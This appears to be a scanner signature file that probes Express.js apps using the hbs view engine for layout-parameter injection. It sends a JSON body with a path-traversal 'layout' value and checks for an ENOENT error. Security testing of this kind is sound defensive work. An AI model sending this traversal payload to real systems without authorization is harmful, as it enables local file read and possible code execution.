id: expressjs-hbs-template-injection
info:
  name: Expressjs hbs Template Injection
  risk: Potential

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/json
    body: |
      { "layout": "./../routes/index.js"}
    detections:
      - >-
        StatusCode() == 500 && StringSearch("response", 'ENOENT: no such file or directory')

references:
  - link: https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/